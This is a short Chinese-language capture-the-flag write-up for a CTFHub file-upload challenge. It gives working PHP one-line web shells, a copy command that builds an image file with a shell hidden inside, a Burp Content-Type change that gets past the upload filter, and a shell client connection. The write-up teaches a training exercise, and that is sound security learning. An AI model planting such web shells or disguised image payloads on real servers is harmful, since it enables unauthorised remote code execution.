【CTF】CTFHub 技能樹 文件頭檢查 writeup

✨PHP一句話木馬

<?php @eval($_POST["pass"]);?>
<?php eval($_REQUEST["pass"]);?>

詳情可瀏覽：Web安全-一句話木馬

 

✨製做圖片馬

 

1)copy命令

copy 1.png/b+1.php/a pic.php

！！！不要使用powershell 請使用cmd

//powershell中copy命令應該命令參數不同 致使各類報錯

 

2）文本編輯器/十六進制編輯器

用文本編輯器/十六進制編輯器打開圖片在末尾添加一句話木馬

而後保存爲xxx.php

//通過測試後續也能夠蟻劍鏈接 和copy命令比較只是文件末尾少了個1A（文件結束符）

知識擴展：ASCII碼0x1A使文件意外結束的處理方法

 

✨Burp改包

Burp開啓proxy後對文件上傳submit抓包

而後修改Content-Type爲image/png

！注意修改位置

//靶場環境只容許PNG、JPG、GIF格式文件上傳 改包繞過

 

✨蟻劍鏈接

得到flag

結束。

 

✨圖片馬注意點

開始遇到問題蟻劍一直鏈接失敗

後來選用了較爲簡單的圖片製做圖片馬蟻劍就鏈接成功了

製做圖片馬的圖片必定要簡單 越簡單越好

好比下面這樣的

 

⭐轉載請註明出處

本文做者：雙份濃縮馥芮白

原文連接：http://www.javashuo.com/article/p-cogyevek-ne.html

版權全部，如需轉載請註明出處。